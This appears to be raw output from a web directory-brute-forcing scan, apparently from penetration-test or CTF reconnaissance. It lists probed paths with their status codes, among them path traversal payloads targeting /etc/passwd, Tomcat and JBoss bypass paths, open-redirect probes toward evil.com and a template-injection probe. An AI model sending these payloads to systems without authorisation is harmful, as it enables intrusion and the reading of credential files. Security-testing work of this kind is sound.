/..;/examples/jsp/index.html[33m (Status: 400)[0m [Size: 795]
/..;/examples/websocket/index.xhtml[33m (Status: 400)[0m [Size: 795]
/..;/manager/html    [33m (Status: 400)[0m [Size: 795]
/..;/examples/servlets/index.html[33m (Status: 400)[0m [Size: 795]
///evil.com/%2F..    [33m (Status: 400)[0m [Size: 804]
//evil.com/%2F..     [33m (Status: 400)[0m [Size: 804]
/?view=log           [32m (Status: 200)[0m [Size: 454]
/admin               [32m (Status: 200)[0m [Size: 454]
/admin/.htpasswd     [32m (Status: 200)[0m [Size: 454]
/admin/              [32m (Status: 200)[0m [Size: 454]
//admin/             [32m (Status: 200)[0m [Size: 454]
/admin/buoy          [32m (Status: 200)[0m [Size: 454]
/admin//phpmyadmin/  [32m (Status: 200)[0m [Size: 454]
/admin/adminer.php   [32m (Status: 200)[0m [Size: 454]
/admin/config        [32m (Status: 200)[0m [Size: 454]
/admin/config.json   [32m (Status: 200)[0m [Size: 454]
/admin/../admin      [32m (Status: 200)[0m [Size: 454]
/admin/configs/application.ini[32m (Status: 200)[0m [Size: 454]
/admin/errors.log    [32m (Status: 200)[0m [Size: 454]
/admin/expvar        [32m (Status: 200)[0m [Size: 454]
/admin/data/autosuggest[32m (Status: 200)[0m [Size: 454]
/admin/error.log     [32m (Status: 200)[0m [Size: 454]
/admin/heapdump      [32m (Status: 200)[0m [Size: 454]
/admin/gc            [32m (Status: 200)[0m [Size: 454]
/admin/log-level     [32m (Status: 200)[0m [Size: 454]
/admin/log/error.log [32m (Status: 200)[0m [Size: 454]
/admin/login.html    [32m (Status: 200)[0m [Size: 454]
/admin/login         [32m (Status: 200)[0m [Size: 454]
/admin/index.php     [32m (Status: 200)[0m [Size: 454]
/admin/metrics       [32m (Status: 200)[0m [Size: 454]
/admin/logs/errors.log[32m (Status: 200)[0m [Size: 454]
/admin/logs/error.log[32m (Status: 200)[0m [Size: 454]
/admin/login/?next=/admin/[32m (Status: 200)[0m [Size: 454]
/admin/init          [32m (Status: 200)[0m [Size: 454]
/admin/outgoing      [32m (Status: 200)[0m [Size: 454]
/admin/ping          [32m (Status: 200)[0m [Size: 454]
/admin/heap          [32m (Status: 200)[0m [Size: 454]
/admin/proxy/discovery[32m (Status: 200)[0m [Size: 454]
/admin/proxy/metrics [32m (Status: 200)[0m [Size: 454]
/admin/pprof         [32m (Status: 200)[0m [Size: 454]
/admin/proxy/configs [32m (Status: 200)[0m [Size: 454]
/admin/proxy/routes  [32m (Status: 200)[0m [Size: 454]
/admin/proxy/config.json[32m (Status: 200)[0m [Size: 454]
/admin/proxy/servers [32m (Status: 200)[0m [Size: 454]
/admin/proxy/tap     [32m (Status: 200)[0m [Size: 454]
/admin/proxy/vars    [32m (Status: 200)[0m [Size: 454]
/admin/runtime/tree  [32m (Status: 200)[0m [Size: 454]
/admin/proxy/versions[32m (Status: 200)[0m [Size: 454]
/admin/proxy/tree    [32m (Status: 200)[0m [Size: 454]
/admin/proxy/svc     [32m (Status: 200)[0m [Size: 454]
/admin/ready         [32m (Status: 200)[0m [Size: 454]
/admin/shutdown      [32m (Status: 200)[0m [Size: 454]
/admin/tap           [32m (Status: 200)[0m [Size: 454]
/admin/threadz       [32m (Status: 200)[0m [Size: 454]
/admin/routes        [32m (Status: 200)[0m [Size: 454]
/admin/tracing       [32m (Status: 200)[0m [Size: 454]
/admin/tls           [32m (Status: 200)[0m [Size: 454]
/admin;/             [32m (Status: 200)[0m [Size: 454]
/admin/views/ajax/autocomplete/user/a[32m (Status: 200)[0m [Size: 454]
/index.php?redirect=/\/evil.com/[33m (Status: 400)[0m [Size: 2077]
/josso/%5C../invoker/EJBInvokerServlet/[33m (Status: 400)[0m [Size: 795]
/josso/%5C../invoker/JMXInvokerServlet/[33m (Status: 400)[0m [Size: 795]
/index.jsp           [32m (Status: 200)[0m [Size: 454]
/login.jsp           [32m (Status: 200)[0m [Size: 7419]
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/debug/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/grafana/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/icon/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/mysql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/dashboard/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/prometheus/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/timeseries/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/testdata/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/welcome/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/public/plugins/zipkin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 804]
/search?search_key={{1337*1338}}[33m (Status: 400)[0m [Size: 2053]
/robots.txt/..;/     [32m (Status: 200)[0m [Size: 454]
/robots.txt/../admin/[32m (Status: 200)[0m [Size: 454]
/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd[33m (Status: 400)[0m [Size: 795]
/static/..%5c..%5c..%5c..%5cetc/passwd[33m (Status: 400)[0m [Size: 795]
/static/..%5c..%5c..%5c..%5c..%5cetc/passwd[33m (Status: 400)[0m [Size: 795]
/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd[33m (Status: 400)[0m [Size: 795]
/static/..%5c..%5c..%5cetc/passwd[33m (Status: 400)[0m [Size: 795]
/static/..%5c..%5cetc/passwd[33m (Status: 400)[0m [Size: 795]
/static/..%5cetc/passwd[33m (Status: 400)[0m [Size: 795]
/static/../../../a/../../../../etc/passwd[33m (Status: 400)[0m [Size: 795]
/static/..;/         [32m (Status: 200)[0m [Size: 454]
/static/../admin/    [32m (Status: 200)[0m [Size: 454]
/?wsdl               [32m (Status: 200)[0m [Size: 83065]
